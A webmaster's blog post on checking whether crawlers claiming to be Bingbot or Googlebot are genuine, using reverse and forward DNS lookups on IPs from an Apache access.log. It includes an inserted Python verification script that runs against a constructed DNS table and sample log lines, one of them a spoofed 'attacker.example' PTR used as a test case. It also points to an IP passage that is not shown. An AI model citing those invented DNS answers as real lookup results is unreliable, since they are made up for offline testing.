207.46.13.179 is requesting content from Freefixer.com approximately every 10 seconds. Quite often, but that’s OK. I would like Freefixer.com to appear at bing.com.

So, how do I know that this in fact is a real Bingbot, and not some unwanted program that scrapes my web site? I’ll use the same procedure as recommended over at Bing Webmaster Tools. That is, a reverse DNS lookup on the IP address, and then a forward DNS lookup on the host name returned by the reverse lookup. If you end up with the same IP that you started with, and the reverse lookup reports a search.msn.com host name, you can rest assured that you are dealing with a legitimate bingbot.

207.46.13.179 is the real Bingbot from Microsoft

If you do an ARIN lookup on 207.46.13.179, you’ll see that Microsoft owns the range from 207.46.0.0 to 207.46.255.255. So I assume you can expect bingbots from any IP address in that range.

GoogleBot, BingBot – Is That Crawler Real or Fake?

I’m currently running FreeFixer.com on a shared Dreamhost server. Dreamhost has a monitoring service that keeps an eye on the total resource usage for each user account. If some user consumes too many resources on the server, the monitoring service starts killing off processes for that user and an email report is sent. This is great since it spares me many of the performance problems caused by other users on the same server.

Some time ago, the resource usage for freefixer.com started hitting the limit but I didn’t notice any additional traffic when I examined the Google Analytics report. This led me to investigate Apache’s access.log file. Here are two example entries from the log:

157.55.39.252 - - [25/Jun/2019:02:37:05 -0700] "GET /library/file/UninstallTP.exe-154295/ HTTP/1.1" 200 17986 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
163.172.64.171 - - [25/Jun/2019:02:37:10 -0700] "GET /b/tag/fake-flash-software/ HTTP/1.1" 200 18719 "-" "Barkrowler/0.9 (+http://www.exensa.com/crawl)"

The first entry (157.55.39.252) claims to be the bingbot and the second (163.172.64.171) is a crawler called Barkrowler (exensa.com).

When examining the access.log a bunch of questions are raised:

  1. Let’s say the crawler claims to be BingBot or GoogleBot, but is it the real one coming from one of Google’s or Microsoft’s data centers, or is it a bot that has falsely set its user agent to GoogleBot or BingBot?
  2. What about all the other bots out there? Their crawling uses quite a lot of resources, but do they bring any value or users to your web site?
  3. What about all the other high-usage IP numbers that claim to be ordinary users? Are their claims correct, or are they just bots in disguise?

I’ll simply post each IP number that I investigate below and you can check out the details by clicking on it. You can find the list down below.

How To Determine If a Bot is Fake

Let’s say you see an entry in the log coming from 157.55.39.252 and it claims to be bingbot. How can we determine that the traffic is from a real bingbot? We can do this using the following two steps:

1) First we do a reverse DNS lookup using the IP from the log.

$ host 157.55.39.252

252.39.55.157.in-addr.arpa domain name pointer msnbot-157-55-39-252.search.msn.com.

The DNS responds with [msnbot-157-55-39-252.search.msn.com].

2) Then we do a forward DNS lookup on the hostname we got from the reverse lookup.

$ dig +short msnbot-157-55-39-252.search.msn.com

157.55.39.252

So, to summarise: 157.55.39.252 points to [msnbot-157-55-39-252.search.msn.com] which is owned by Microsoft. And the [msnbot-157-55-39-252.search.msn.com] hostname resolves back to 157.55.39.252 which we started with. Excellent, we now know that we are dealing with a legitimate bingbot.
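The reverse-then-forward check described here (and under 66.249.79.159 above), as an added Python example that is not code from the post. It assumes the crawler domains listed in CRAWLER_DOMAINS and ships a constructed DNS table (FAKE_PTR/FAKE_A) so it runs offline; the system resolver is the default when you point it at a real access.log.

```python
import re
import socket
from typing import Iterable, Optional

# Hostname suffixes the engines publish for their crawlers' reverse DNS:
# Bingbot under search.msn.com, Googlebot under googlebot.com / google.com.
CRAWLER_DOMAINS = {
    "bingbot": ("search.msn.com",),
    "googlebot": ("googlebot.com", "google.com"),
}

# Combined log format, as in the access.log excerpts in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def system_rdns(ip: str) -> Optional[str]:
    """Reverse lookup via the system resolver (what `host <ip>` does)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None

def system_fdns(host: str) -> Iterable[str]:
    """Forward lookup; every A/AAAA answer (what `dig +short <host>` prints)."""
    try:
        return {entry[4][0] for entry in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return set()

def claimed_crawler(user_agent: str) -> Optional[str]:
    """Which search-engine bot the User-Agent claims to be, or None."""
    ua = user_agent.lower()
    return next((name for name in CRAWLER_DOMAINS if name in ua), None)

def verify_crawler(ip, claimed, rdns=system_rdns, fdns=system_fdns):
    """The post's two-step check: the PTR must be under the engine's domain
    AND must resolve back to the same IP. Returns (ok, reason). The resolvers
    are parameters so the logic can be exercised without network access."""
    domains = CRAWLER_DOMAINS.get(claimed)
    if domains is None:
        return False, f"no verification rule for {claimed!r}"
    host = rdns(ip)
    if not host:
        return False, "no PTR record"
    host = host.rstrip(".").lower()
    # Match on label boundaries only: "search.msn.com.attacker.example" and
    # "notsearch.msn.com" must both fail here.
    if not any(host == d or host.endswith("." + d) for d in domains):
        return False, f"PTR {host} is not under {', '.join(domains)}"
    if ip not in set(fdns(host)):
        return False, f"{host} does not resolve back to {ip}"
    return True, host

def check_log_line(line, rdns=system_rdns, fdns=system_fdns):
    """Parse one access.log line and verify the crawler it claims to be.
    Returns (ip, claimed, ok, reason), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, claimed = m.group("ip"), claimed_crawler(m.group("ua"))
    if claimed is None:
        return ip, None, False, "does not claim to be a known crawler"
    ok, reason = verify_crawler(ip, claimed, rdns, fdns)
    return ip, claimed, ok, reason

# Constructed DNS answers for offline use (not real lookups). The first entry
# mirrors the answers the post shows for 157.55.39.252; the documentation-range
# addresses stand in for a PTR outside Microsoft's domain and for a PTR under
# search.msn.com whose forward lookup does not come back to the same IP.
FAKE_PTR = {
    "157.55.39.252": "msnbot-157-55-39-252.search.msn.com.",
    "203.0.113.9": "search.msn.com.attacker.example.",
    "198.51.100.7": "msnbot-fake.search.msn.com.",
}
FAKE_A = {
    "msnbot-157-55-39-252.search.msn.com": {"157.55.39.252"},
    "search.msn.com.attacker.example": {"203.0.113.9"},
    "msnbot-fake.search.msn.com": {"10.0.0.1"},
}

def fake_rdns(ip):
    return FAKE_PTR.get(ip)

def fake_fdns(host):
    return FAKE_A.get(host, set())

UA = '"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"'
# Constructed log lines in the same format as the excerpts above.
SAMPLE_LOG = [
    '157.55.39.252 - - [25/Jun/2019:02:37:05 -0700] "GET /library/file/UninstallTP.exe-154295/ HTTP/1.1" 200 17986 "-" ' + UA,
    '203.0.113.9 - - [25/Jun/2019:02:37:06 -0700] "GET / HTTP/1.1" 200 512 "-" ' + UA,
    '198.51.100.7 - - [25/Jun/2019:02:37:07 -0700] "GET / HTTP/1.1" 200 512 "-" ' + UA,
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        ip, claimed, ok, reason = check_log_line(line, fake_rdns, fake_fdns)
        print(f"{ip:<15} {claimed or '-':<9} {'OK ' if ok else 'BAD'} {reason}")
```

Only the first sample passes both steps; the second fails the domain check and the third fails the forward lookup, which is why step 2 cannot be skipped.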

Another way to check if an IP belongs to bingbot, if you don’t have the host and dig command line tools available, is to use Bing’s Verify Bingbot Tool. You simply type in the IP address, in this case 157.55.39.252, and solve the captcha.

Verify bingbot tool reports 157.55.39.252 is a real bingbot
Verify bingbot for 157.55.39.252

I’m not aware of web verification tools for the other search engines such as Google or Yandex. If you know about such a tool, please let me know.

IP Addresses